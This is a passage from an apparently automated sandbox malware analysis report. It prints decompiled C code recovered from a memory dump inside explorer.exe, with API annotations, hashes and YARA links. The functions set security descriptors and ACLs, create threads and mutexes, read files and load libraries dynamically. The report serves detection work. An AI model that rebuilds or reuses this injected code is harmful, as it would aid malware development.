        • Opcode ID: 18816e49f38be429948ef6d3383d30e391c2da75528b0b403aeef7b17627c66c
        • Instruction ID: a5438fa8a69558a9aa6e28972bce87c3de03cd7a9a26965d290b63cd5faf2151
        • Opcode Fuzzy Hash: 18816e49f38be429948ef6d3383d30e391c2da75528b0b403aeef7b17627c66c
        • Instruction Fuzzy Hash: FE31EF753043105AFA54FB74DC86ABE3399FB90750F14002AFA828B283EF26CD01C752
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00082AEA, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 71stringCOMMON
        Download Yara Rule
        C-Code - Quality: 89%
        			E00082AEA() {
				intOrPtr _v8;
				signed int _v12;
				CHAR* _v16;
				signed int _t16;
				intOrPtr _t21;
				intOrPtr _t22;
				void* _t26;
				void* _t29;
				signed int _t31;
				intOrPtr _t36;
				CHAR* _t38;
				intOrPtr _t39;
				void* _t40;

				_t15 =  *0x9e710 * 0x64;
				_t39 = 0;
				_v12 =  *0x9e710 * 0x64;
				_t16 = E00088604(_t15);
				_t38 = _t16;
				_v16 = _t38;
				if(_t38 != 0) {
					_t31 =  *0x9e710; // 0x2
					_t36 = 0;
					_v8 = 0;
					if(_t31 == 0) {
						L9:
						_push(_t38);
						E00089F48(0xe); // executed
						E0008861A( &_v16, _t39);
						return 0;
					}
					_t29 = 0;
					do {
						_t21 =  *0x9e714; // 0x133fe78
						if( *((intOrPtr*)(_t29 + _t21)) != 0) {
							if(_t39 != 0) {
								lstrcatA(_t38, "|");
								_t39 = _t39 + 1;
							}
							_t22 =  *0x9e714; // 0x133fe78
							_push( *((intOrPtr*)(_t29 + _t22 + 0x10)));
							_push( *((intOrPtr*)(_t29 + _t22 + 8)));
							_t26 = E00089601( &(_t38[_t39]), _v12 - _t39, "%u;%u;%u",  *((intOrPtr*)(_t29 + _t22)));
							_t31 =  *0x9e710; // 0x2
							_t40 = _t40 + 0x18;
							_t36 = _v8;
							_t39 = _t39 + _t26;
						}
						_t36 = _t36 + 1;
						_t29 = _t29 + 0x20;
						_v8 = _t36;
					} while (_t36 < _t31);
					goto L9;
				}
				return _t16 | 0xffffffff;
			}
















        0x00082af0
        0x00082afa
        0x00082afd
        0x00082b00
        0x00082b05
        0x00082b07
        0x00082b0d
        0x00082b17
        0x00082b1d
        0x00082b1f
        0x00082b24
        0x00082b81
        0x00082b87
        0x00082b8b
        0x00082b96
        0x00000000
        0x00082b9d
        0x00082b26
        0x00082b28
        0x00082b28
        0x00082b31
        0x00082b35
        0x00082b3d
        0x00082b43
        0x00082b43
        0x00082b44
        0x00082b49
        0x00082b4d
        0x00082b63
        0x00082b68
        0x00082b6e
        0x00082b71
        0x00082b74
        0x00082b74
        0x00082b76
        0x00082b77
        0x00082b7a
        0x00082b7d
        0x00000000
        0x00082b28
        0x00000000

        APIs
          • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
        • lstrcatA.KERNEL32(00000000,0009B9A0,0008573E,-00000020,00000000,?,00000000,?,?,?,?,?,?,?,0008573E), ref: 00082B3D
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: AllocateHeaplstrcat
        • String ID: %u;%u;%u
        • API String ID: 3011335133-2973439046
        • Opcode ID: 7a3fd77245582d844e0d8f1f61c7398da9a49d0849e7c8a4a8e8fb0d67d6490a
        • Instruction ID: 5a0a3936677ef0304e341d4e43594f78b37864cc0fc2619589e6b45d54e6a73c
        • Opcode Fuzzy Hash: 7a3fd77245582d844e0d8f1f61c7398da9a49d0849e7c8a4a8e8fb0d67d6490a
        • Instruction Fuzzy Hash: 7111E132A05300EBDB14EFE9EC85DAABBA9FB84324B10442AE50097191DB349900CB51
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0008BD10, Relevance: 3.1, APIs: 2, Instructions: 149memoryCOMMON
        Download Yara Rule
        C-Code - Quality: 59%
        			E0008BD10() {
				char _v8;
				void* _v12;
				char _v16;
				short _v20;
				char _v24;
				short _v28;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v88;
				intOrPtr _v92;
				void _v96;
				intOrPtr _t58;
				intOrPtr _t61;
				intOrPtr _t63;
				intOrPtr _t65;
				intOrPtr _t67;
				intOrPtr _t70;
				intOrPtr _t73;
				intOrPtr _t77;
				intOrPtr _t79;
				intOrPtr _t81;
				intOrPtr _t85;
				intOrPtr _t87;
				signed int _t90;
				void* _t92;
				intOrPtr _t93;
				void* _t98;

				_t90 = 8;
				_v28 = 0xf00;
				_v32 = 0;
				_v24 = 0;
				memset( &_v96, 0, _t90 << 2);
				_v20 = 0x100;
				_push( &_v12);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_v16 = 0;
				_push(0);
				_v8 = 0;
				_push(1);
				_v12 = 0;
				_push( &_v24);
				_t58 =  *0x9e68c; // 0x133fab8
				_t98 = 0;
				if( *((intOrPtr*)(_t58 + 0xc))() == 0) {
					L14:
					if(_v8 != 0) {
						_t67 =  *0x9e68c; // 0x133fab8
						 *((intOrPtr*)(_t67 + 0x10))(_v8);
					}
					if(_v12 != 0) {
						_t65 =  *0x9e68c; // 0x133fab8
						 *((intOrPtr*)(_t65 + 0x10))(_v12);
					}
					if(_t98 != 0) {
						_t63 =  *0x9e684; // 0x133f8f0
						 *((intOrPtr*)(_t63 + 0x34))(_t98);
					}
					if(_v16 != 0) {
						_t61 =  *0x9e684; // 0x133f8f0
						 *((intOrPtr*)(_t61 + 0x34))(_v16);
					}
					L22:
					return _t98;
				}
				_v68 = _v12;
				_t70 =  *0x9e688; // 0xb0000
				_t92 = 2;
				_v96 = 0x1fffff;
				_v92 = 0;
				_v88 = 3;
				_v76 = 0;
				_v72 = 5;
				if( *((intOrPtr*)(_t70 + 4)) != 6 ||  *((intOrPtr*)(_t70 + 8)) < 0) {
					if( *((intOrPtr*)(_t70 + 4)) < 0xa) {
						goto L7;
					}
					goto L4;
				} else {
					L4:
					_push( &_v8);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(1);
					_push(_t92);
					_push(_t92);
					_push( &_v32);
					_t85 =  *0x9e68c; // 0x133fab8
					if( *((intOrPtr*)(_t85 + 0xc))() == 0) {
						goto L14;
					} else {
						_t87 = _v8;
						if(_t87 != 0) {
							_push(2);
							_pop(1);
							_v64 = 0x1fffff;
							_v60 = 1;
							_v56 = 3;
							_v44 = 0;
							_v40 = 1;
							_v36 = _t87;
						}
						L7:
						_push( &_v16);
						_push(0);
						_push( &_v96);
						_t73 =  *0x9e68c; // 0x133fab8
						_push(1); // executed
						if( *((intOrPtr*)(_t73 + 8))() != 0) {
							goto L14;
						}
						_t98 = LocalAlloc(0x40, 0x14);
						if(_t98 == 0) {
							goto L14;
						}
						_t93 =  *0x9e68c; // 0x133fab8
						_push(1);
						_push(_t98);
						if( *((intOrPtr*)(_t93 + 0x90))() == 0) {
							goto L14;
						}
						_t77 =  *0x9e68c; // 0x133fab8
						_push(0);
						_push(_v16);
						_push(1);
						_push(_t98);
						if( *((intOrPtr*)(_t77 + 0x94))() == 0) {
							goto L14;
						}
						if(_v8 != 0) {
							_t81 =  *0x9e68c; // 0x133fab8
							 *((intOrPtr*)(_t81 + 0x10))(_v8);
						}
						_t79 =  *0x9e68c; // 0x133fab8
						 *((intOrPtr*)(_t79 + 0x10))(_v12);
						goto L22;
					}
				}
			}






































        0x0008bd1b
        0x0008bd1e
        0x0008bd26
        0x0008bd2c
        0x0008bd2f
        0x0008bd34
        0x0008bd3a
        0x0008bd3b
        0x0008bd3c
        0x0008bd3d
        0x0008bd3e
        0x0008bd3f
        0x0008bd40
        0x0008bd41
        0x0008bd44
        0x0008bd47
        0x0008bd49
        0x0008bd4c
        0x0008bd50
        0x0008bd53
        0x0008bd54
        0x0008bd59
        0x0008bd60
        0x0008be54
        0x0008be58
        0x0008be5a
        0x0008be62
        0x0008be62
        0x0008be69
        0x0008be6b
        0x0008be73
        0x0008be73
        0x0008be78
        0x0008be7a
        0x0008be80
        0x0008be80
        0x0008be87
        0x0008be89
        0x0008be91
        0x0008be91
        0x0008be95
        0x0008be9a
        0x0008be9a
        0x0008bd6b
        0x0008bd6e
        0x0008bd75
        0x0008bd76
        0x0008bd7d
        0x0008bd80
        0x0008bd87
        0x0008bd8a
        0x0008bd95
        0x0008bda0
        0x00000000
        0x00000000
        0x00000000
        0x0008bda2
        0x0008bda2
        0x0008bda5
        0x0008bda6
        0x0008bda7
        0x0008bda8
        0x0008bda9
        0x0008bdaa
        0x0008bdab
        0x0008bdac
        0x0008bdae
        0x0008bdaf
        0x0008bdb3
        0x0008bdb4
        0x0008bdbe
        0x00000000
        0x0008bdc4
        0x0008bdc4
        0x0008bdc9
        0x0008bdcb
        0x0008bdcd
        0x0008bdce
        0x0008bdd5
        0x0008bdd8
        0x0008bddf
        0x0008bde2
        0x0008bde5
        0x0008bde5
        0x0008bde8
        0x0008bdeb
        0x0008bdec
        0x0008bdf0
        0x0008bdf1
        0x0008bdf6
        0x0008bdfc
        0x00000000
        0x00000000
        0x0008be08
        0x0008be0c
        0x00000000
        0x00000000
        0x0008be0e
        0x0008be14
        0x0008be16
        0x0008be1f
        0x00000000
        0x00000000
        0x0008be21
        0x0008be26
        0x0008be27
        0x0008be2a
        0x0008be2c
        0x0008be35
        0x00000000
        0x00000000
        0x0008be3a
        0x0008be3c
        0x0008be44
        0x0008be44
        0x0008be47
        0x0008be4f
        0x00000000
        0x0008be4f
        0x0008bdbe

        APIs
        • SetEntriesInAclA.ADVAPI32(00000001,001FFFFF,00000000,?), ref: 0008BDF7
        • LocalAlloc.KERNEL32(00000040,00000014), ref: 0008BE02
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: AllocEntriesLocal
        • String ID:
        • API String ID: 2146116654-0
        • Opcode ID: abd2abb1c2a675e30db1c05a41365c71064cf18d764b66cf42dc4a5385c88731
        • Instruction ID: 3aa66279fdb8b3e8acfe9a35cde7f6eb8d9a09b5f03ef1515584b77c0f26ffcf
        • Opcode Fuzzy Hash: abd2abb1c2a675e30db1c05a41365c71064cf18d764b66cf42dc4a5385c88731
        • Instruction Fuzzy Hash: C3512A71A00248EFEB64DF99D888ADEBBF8FF44704F15806AF604AB260D7749D45CB50
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000898EE, Relevance: 3.1, APIs: 2, Instructions: 133COMMON
        Download Yara Rule
        C-Code - Quality: 94%
        			E000898EE(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t45;
				intOrPtr _t46;
				intOrPtr _t48;
				intOrPtr _t49;
				void* _t52;
				intOrPtr _t53;
				intOrPtr _t54;
				struct _SECURITY_ATTRIBUTES* _t58;
				intOrPtr _t59;
				intOrPtr _t61;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t69;
				struct _SECURITY_ATTRIBUTES* _t73;
				intOrPtr _t74;
				intOrPtr _t77;
				intOrPtr _t78;
				intOrPtr _t79;
				intOrPtr _t82;
				intOrPtr _t83;
				void* _t86;
				intOrPtr _t87;
				intOrPtr _t89;
				signed int _t92;
				intOrPtr _t97;
				intOrPtr _t98;
				int _t106;
				intOrPtr _t110;
				signed int _t112;
				signed int _t113;
				void* _t115;

				_push(__ecx);
				_push(__ecx);
				_v8 = __edx;
				_v12 = __ecx;
				_t77 =  *0x9e76c; // 0x1dc
				_t73 = 0;
				if(E0008A4BF(_t77, 0x7530) >= 0) {
					_t45 =  *0x9e770; // 0x13395a0
					_t112 = 0;
					_t106 = 0;
					do {
						_t78 =  *((intOrPtr*)(_t106 + _t45));
						if(_t78 == 0) {
							L6:
							if( *((intOrPtr*)(_t106 + _t45)) == _t73) {
								_t113 = _t112 << 5;
								if(_v8 == _t73) {
									 *(_t113 + _t45 + 0x10) = _t73;
									_t46 =  *0x9e770; // 0x13395a0
									 *(_t113 + _t46 + 0xc) = _t73;
									L14:
									_t79 =  *0x9e770; // 0x13395a0
									 *((intOrPtr*)(_t113 + _t79 + 0x14)) = _a8;
									_t48 =  *0x9e770; // 0x13395a0
									 *((intOrPtr*)(_t113 + _t48 + 8)) = _v12;
									_t49 = E0008A471(0, 1);
									_t82 =  *0x9e770; // 0x13395a0
									 *((intOrPtr*)(_t113 + _t82 + 0x1c)) = _t49;
									_t83 =  *0x9e770; // 0x13395a0
									_t30 = _t83 + _t113 + 4; // 0x13395a4
									_t52 = CreateThread(_t73, _t73, E000898A6, _t83 + _t113, _t73, _t30);
									_t53 =  *0x9e770; // 0x13395a0
									 *(_t113 + _t53) = _t52;
									_t54 =  *0x9e770; // 0x13395a0
									_t86 =  *(_t113 + _t54);
									if(_t86 != 0) {
										SetThreadPriority(_t86, 0xffffffff);
										_t87 =  *0x9e770; // 0x13395a0
										 *0x9e774 =  *0x9e774 + 1;
										E0008A4DB( *((intOrPtr*)(_t113 + _t87 + 0x1c)));
										_t74 =  *0x9e770; // 0x13395a0
										_t73 = _t74 + _t113;
									} else {
										_t59 =  *0x9e684; // 0x133f8f0
										 *((intOrPtr*)(_t59 + 0x30))( *((intOrPtr*)(_t113 + _t54 + 0x1c)));
										_t61 =  *0x9e770; // 0x13395a0
										_t37 = _t61 + 0xc; // 0x13395ac
										_t91 = _t37 + _t113;
										if( *((intOrPtr*)(_t37 + _t113)) != _t73) {
											E0008861A(_t91,  *((intOrPtr*)(_t113 + _t61 + 0x10)));
											_t61 =  *0x9e770; // 0x13395a0
										}
										_t92 = 8;
										memset(_t113 + _t61, 0, _t92 << 2);
									}
									L19:
									_t89 =  *0x9e76c; // 0x1dc
									E0008A4DB(_t89);
									_t58 = _t73;
									L20:
									return _t58;
								}
								_t110 = _a4;
								_t65 = E00088604(_t110);
								_t97 =  *0x9e770; // 0x13395a0
								 *((intOrPtr*)(_t113 + _t97 + 0xc)) = _t65;
								_t66 =  *0x9e770; // 0x13395a0
								if( *((intOrPtr*)(_t113 + _t66 + 0xc)) == _t73) {
									goto L19;
								}
								 *((intOrPtr*)(_t113 + _t66 + 0x10)) = _t110;
								_t67 =  *0x9e770; // 0x13395a0
								E000886E1( *((intOrPtr*)(_t113 + _t67 + 0xc)), _v8, _t110);
								_t115 = _t115 + 0xc;
								goto L14;
							}
							goto L7;
						}
						_t69 =  *0x9e684; // 0x133f8f0
						_push(_t73);
						_push(_t78);
						if( *((intOrPtr*)(_t69 + 0x2c))() == 0x102) {
							_t45 =  *0x9e770; // 0x13395a0
							goto L7;
						}
						_t98 =  *0x9e770; // 0x13395a0
						E0008984A(_t106 + _t98, 0);
						_t45 =  *0x9e770; // 0x13395a0
						goto L6;
						L7:
						_t106 = _t106 + 0x20;
						_t112 = _t112 + 1;
					} while (_t106 < 0x1000);
					goto L19;
				}
				_t58 = 0;
				goto L20;
			}





































        0x000898f1
        0x000898f2
        0x000898f3
        0x000898fb
        0x000898fe
        0x00089905
        0x0008990e
        0x00089917
        0x0008991e
        0x00089920
        0x00089922
        0x00089922
        0x00089927
        0x0008994f
        0x00089952
        0x0008996c
        0x00089972
        0x000899b2
        0x000899b6
        0x000899bb
        0x000899bf
        0x000899bf
        0x000899cb
        0x000899cf
        0x000899d7
        0x000899dd
        0x000899e2
        0x000899e8
        0x000899ec
        0x000899f4
        0x00089a06
        0x00089a0b
        0x00089a10
        0x00089a13
        0x00089a18
        0x00089a1d
        0x00089a59
        0x00089a5f
        0x00089a65
        0x00089a6f
        0x00089a74
        0x00089a7a
        0x00089a1f
        0x00089a23
        0x00089a28
        0x00089a2b
        0x00089a30
        0x00089a33
        0x00089a37
        0x00089a3e
        0x00089a43
        0x00089a49
        0x00089a51
        0x00089a52
        0x00089a52
        0x00089a7c
        0x00089a7c
        0x00089a82
        0x00089a88
        0x00089a8b
        0x00089a8d
        0x00089a8d
        0x00089974
        0x00089978
        0x0008997e
        0x00089984
        0x00089988
        0x00089991
        0x00000000
        0x00000000
        0x00089997
        0x0008999b
        0x000899a8
        0x000899ad
        0x00000000
        0x000899ad
        0x00000000
        0x00089952
        0x00089929
        0x0008992e
        0x0008992f
        0x00089938
        0x00089965
        0x00000000
        0x00089965
        0x0008993a
        0x00089945
        0x0008994a
        0x00000000
        0x00089954
        0x00089954
        0x00089957
        0x00089958
        0x00000000
        0x00089960
        0x00089910
        0x00000000

        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: d85dcc44abdee5eb962f219b78c68e4bab4d13c627165069f4ee2b0541897e29
        • Instruction ID: 2208b45a903d8e4e3ebf4af7583ef236fbc94e4c18dfd99628fde9c82a46c99b
        • Opcode Fuzzy Hash: d85dcc44abdee5eb962f219b78c68e4bab4d13c627165069f4ee2b0541897e29
        • Instruction Fuzzy Hash: 4F515171614640DFEB69EFA8DC84876F7F9FB48314358892EE48687361D735AC02CB42
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0008A6A9, Relevance: 3.1, APIs: 2, Instructions: 90fileCOMMON
        Download Yara Rule
        C-Code - Quality: 27%
        			E0008A6A9(void* __ecx, signed int _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t29;
				intOrPtr _t34;
				intOrPtr* _t39;
				void* _t47;
				intOrPtr _t55;
				intOrPtr _t58;
				char _t60;

				_push(__ecx);
				_push(__ecx);
				_t50 = _a4;
				_t60 = 0;
				_v12 = 0;
				if(_a4 != 0) {
					_t47 = E0008A63B(_t50);
					if(_t47 == 0) {
						L11:
						_t26 = 0;
						L12:
						L13:
						return _t26;
					}
					_t27 =  *0x9e684; // 0x133f8f0
					_t58 =  *((intOrPtr*)(_t27 + 0xe8))(_t47, 0);
					if(_t58 == 0) {
						L9:
						_t29 =  *0x9e684; // 0x133f8f0
						 *((intOrPtr*)(_t29 + 0x30))(_t47);
						if(_t60 != 0) {
							E0008861A( &_v12, 0);
						}
						goto L11;
					}
					_t4 = _t58 + 1; // 0x1
					_t34 = E00088604(_t4); // executed
					_t60 = _t34;
					_v12 = _t60;
					if(_t60 == 0) {
						goto L9;
					}
					_a4 = _a4 & 0;
					_push(0);
					_v8 = 0;
					_push( &_a4);
					_push(_t58);
					_push(_t60);
					while(ReadFile(_t47, ??, ??, ??, ??) != 0) {
						if(_a4 == 0) {
							if(_v8 != _t58) {
								goto L9;
							}
							_t39 = _a8;
							 *((char*)(_t58 + _t60)) = 0;
							if(_t39 != 0) {
								 *_t39 = _t58;
							}
							CloseHandle(_t47);
							_t26 = _t60;
							goto L12;
						}
						_t55 = _v8 + _a4;
						_a4 = _a4 & 0x00000000;
						_push(0);
						_push( &_a4);
						_v8 = _t55;
						_push(_t58 - _t55);
						_push(_t55 + _t60);
					}
					goto L9;
				}
				_t26 = 0;
				goto L13;
			}














        0x0008a6ac
        0x0008a6ad
        0x0008a6ae
        0x0008a6b2
        0x0008a6b4
        0x0008a6b9
        0x0008a6c9
        0x0008a6cd
        0x0008a757
        0x0008a757
        0x0008a759
        0x0008a75b
        0x0008a75d
        0x0008a75d
        0x0008a6d3
        0x0008a6e1
        0x0008a6e5
        0x0008a73d
        0x0008a73d
        0x0008a743
        0x0008a748
        0x0008a750
        0x0008a756
        0x00000000
        0x0008a748
        0x0008a6e7
        0x0008a6eb
        0x0008a6f0
        0x0008a6f2
        0x0008a6f8
        0x00000000
        0x00000000
        0x0008a6fc
        0x0008a6ff
        0x0008a700
        0x0008a706
        0x0008a707
        0x0008a708
        0x0008a72d
        0x0008a70f
        0x0008a761
        0x00000000
        0x00000000
        0x0008a763
        0x0008a766
        0x0008a76c
        0x0008a76e
        0x0008a76e
        0x0008a776
        0x0008a779
        0x00000000
        0x0008a779
        0x0008a717
        0x0008a71a
        0x0008a71e
        0x0008a720
        0x0008a723
        0x0008a728
        0x0008a72c
        0x0008a72c
        0x00000000
        0x0008a72d
        0x0008a6bb
        0x00000000

        APIs
        • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,0008FA56,00000000,0008F8B5,000AEFE0,0009B990,00000000,0009B990,00000000,00000000,00000615), ref: 0008A733
        • CloseHandle.KERNELBASE(00000000,?,0008FA56,00000000,0008F8B5,000AEFE0,0009B990,00000000,0009B990,00000000,00000000,00000615,0000034A,00000000,0133FD20,00000400), ref: 0008A776
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: CloseFileHandleRead
        • String ID:
        • API String ID: 2331702139-0
        • Opcode ID: 701268faecb08c7e662e07772a1ad47cf862077a9b2ff723ed93e566bb39f527
        • Instruction ID: 682a662acdfee72883915282426476a47a31b64306a9f0d0b2be5f1f474e3a22
        • Opcode Fuzzy Hash: 701268faecb08c7e662e07772a1ad47cf862077a9b2ff723ed93e566bb39f527
        • Instruction Fuzzy Hash: DE218D76B04205AFEB50EF64CC84FAA77FCBB05744F10806AF946DB642E770D9409B91
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0008153B, Relevance: 3.1, APIs: 2, Instructions: 69synchronizationCOMMON
        Download Yara Rule
        C-Code - Quality: 76%
        			E0008153B(void* __ecx, void* __edx) {
				void* _v8;
				void* _t3;
				signed int _t4;
				intOrPtr _t7;
				signed int _t9;
				intOrPtr _t10;
				void* _t24;

				_push(__ecx);
				_t3 = CreateMutexA(0, 0, 0);
				 *0x9e6f4 = _t3;
				if(_t3 == 0) {
					L11:
					_t4 = _t3 | 0xffffffff;
					__eflags = _t4;
				} else {
					_t3 = CreateMutexA(0, 0, 0);
					 *0x9e6dc = _t3;
					if(_t3 == 0) {
						goto L11;
					} else {
						_t3 = E00081080(0x4ac);
						_v8 = _t3;
						if(_t3 == 0) {
							goto L11;
						} else {
							 *0x9e6e8 = E000891A6(_t3, 0);
							E000885C2( &_v8);
							_t7 = E00088604(0x100);
							 *0x9e6f0 = _t7;
							if(_t7 != 0) {
								 *0x9e6fc = 0;
								_t9 = E00088604(0x401);
								 *0x9e6d4 = _t9;
								__eflags = _t9;
								if(_t9 != 0) {
									__eflags =  *0x9e6c0; // 0x0
									if(__eflags == 0) {
										E000915B6(0x88202, 0x8820b);
									}
									_push(0x61e);
									_t24 = 8;
									_t10 = E0008E1BC(0x9bd28, _t24); // executed
									 *0x9e6a0 = _t10;
									_t4 = 0;
								} else {
									_push(0xfffffffc);
									goto L5;
								}
							} else {
								_push(0xfffffffe);
								L5:
								_pop(_t4);
							}
						}
					}
				}
				return _t4;
			}










        0x0008153e
        0x00081545
        0x0008154b
        0x00081552
        0x00081607
        0x00081607
        0x00081607
        0x00081558
        0x0008155b
        0x00081561
        0x00081568
        0x00000000
        0x0008156e
        0x00081573
        0x00081578
        0x0008157d
        0x00000000
        0x00081583
        0x0008158f
        0x00081594
        0x0008159e
        0x000815a3
        0x000815ab
        0x000815b9
        0x000815bf
        0x000815c4
        0x000815ca
        0x000815cc
        0x000815d2
        0x000815d8
        0x000815e4
        0x000815ea
        0x000815eb
        0x000815f2
        0x000815f8
        0x000815fd
        0x00081602
        0x000815ce
        0x000815ce
        0x00000000
        0x000815ce
        0x000815ad
        0x000815ad
        0x000815af
        0x000815af
        0x000815af
        0x000815ab
        0x0008157d
        0x00081568
        0x0008160c

        APIs
        • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,00085707), ref: 00081545
        • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,00085707), ref: 0008155B
          • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: CreateMutex$AllocateHeap
        • String ID:
        • API String ID: 704353917-0
        • Opcode ID: 77af8db251a9b19979746917907dab4167f055f59f2981c2fe2ca95fd249f9b3
        • Instruction ID: ebe42fdb1850e6894ca3f7a01c19cd8768a376f5bc184f032faea728c04dbff3
        • Opcode Fuzzy Hash: 77af8db251a9b19979746917907dab4167f055f59f2981c2fe2ca95fd249f9b3
        • Instruction Fuzzy Hash: A111C871604A82AAFB60FB76EC059AA36E8FFD17B0760462BE5D1D51D1FF74C8018710
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0008BC7A, Relevance: 3.1, APIs: 2, Instructions: 59COMMON
        Download Yara Rule
        C-Code - Quality: 44%
        			E0008BC7A(void* __ecx, void* __edx) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _t18;
				intOrPtr _t19;
				intOrPtr _t27;
				intOrPtr _t30;
				intOrPtr _t36;
				intOrPtr _t38;
				char _t39;

				_t39 = 0;
				_t38 =  *0x9e674; // 0x1f8
				_v8 = 0;
				_v12 = 0;
				_v20 = 0;
				_v16 = 0;
				_t18 = E000895E1(__ecx, 0x84b);
				_push(0);
				_v24 = _t18;
				_push( &_v8);
				_push(1);
				_push(_t18);
				_t19 =  *0x9e68c; // 0x133fab8, executed
				if( *((intOrPtr*)(_t19 + 0x84))() != 0) {
					_push( &_v16);
					_push( &_v12);
					_push( &_v20);
					_t27 =  *0x9e68c; // 0x133fab8
					_push(_v8);
					if( *((intOrPtr*)(_t27 + 0x88))() != 0) {
						_push(_v12);
						_t30 =  *0x9e68c; // 0x133fab8
						_push(0);
						_push(0);
						_push(0);
						_push(0x10);
						_push(6);
						_push(_t38); // executed
						if( *((intOrPtr*)(_t30 + 0x8c))() == 0) {
							_t39 = 1;
						}
					}
					_t36 =  *0x9e68c; // 0x133fab8
					 *((intOrPtr*)(_t36 + 0x10))(_v8);
				}
				E000885D5( &_v24);
				return _t39;
			}















        0x0008bc81
        0x0008bc84
        0x0008bc8f
        0x0008bc92
        0x0008bc95
        0x0008bc98
        0x0008bc9b
        0x0008bca1
        0x0008bca5
        0x0008bca8
        0x0008bca9
        0x0008bcab
        0x0008bcac
        0x0008bcb9
        0x0008bcbe
        0x0008bcc2
        0x0008bcc6
        0x0008bcc7
        0x0008bccc
        0x0008bcd7
        0x0008bcd9
        0x0008bcdc
        0x0008bce1
        0x0008bce2
        0x0008bce3
        0x0008bce4
        0x0008bce6
        0x0008bce8
        0x0008bcf1
        0x0008bcf3
        0x0008bcf3
        0x0008bcf1
        0x0008bcf4
        0x0008bcfd
        0x0008bcfd
        0x0008bd04
        0x0008bd0f

        APIs
        • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000000,?,00083268,?,?,00000000,?,?,?,00085721), ref: 0008BCB1
        • SetSecurityInfo.ADVAPI32(000001F8,00000006,00000010,00000000,00000000,00000000,?,?,00083268,?,?,00000000,?,?,?,00085721), ref: 0008BCE9
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: Security$Descriptor$ConvertInfoString
        • String ID:
        • API String ID: 3187949549-0
        • Opcode ID: 49105266334ca50b45e4c17bdeae0f8f274821862b6dd8d3608f6b368af892b6
        • Instruction ID: 4b82ffe8c45477c1650446b5343723a2aeaa491c0a074740823efd8a3710dd5b
        • Opcode Fuzzy Hash: 49105266334ca50b45e4c17bdeae0f8f274821862b6dd8d3608f6b368af892b6
        • Instruction Fuzzy Hash: 54113A72A00219BBDB10EF95DC49EEEBBBCFF04740F1040A6B545E7151DBB09A01CBA0
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0008E1BC, Relevance: 3.0, APIs: 2, Instructions: 35libraryCOMMON
        Download Yara Rule
        C-Code - Quality: 47%
        			E0008E1BC(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v8;
				char _t5;
				struct HINSTANCE__* _t7;
				void* _t10;
				void* _t12;
				void* _t22;
				void* _t25;

				_push(__ecx);
				_t12 = __ecx;
				_t22 = __edx;
				_t5 = E000895C7(_a4);
				_t25 = 0;
				_v8 = _t5;
				_push(_t5);
				if(_a4 != 0x7c3) {
					_t7 = LoadLibraryA(); // executed
				} else {
					_t7 = GetModuleHandleA();
				}
				if(_t7 != 0) {
					_t10 = E0008E171(_t12, _t22, _t7); // executed
					_t25 = _t10;
				}
				E000885C2( &_v8);
				return _t25;
			}










        0x0008e1bf
        0x0008e1c2
        0x0008e1c8
        0x0008e1ca
        0x0008e1cf
        0x0008e1d1
        0x0008e1db
        0x0008e1dc
        0x0008e1eb
        0x0008e1de
        0x0008e1de
        0x0008e1de
        0x0008e1ef
        0x0008e1f6
        0x0008e1fc
        0x0008e1fc
        0x0008e201
        0x0008e20c

        APIs
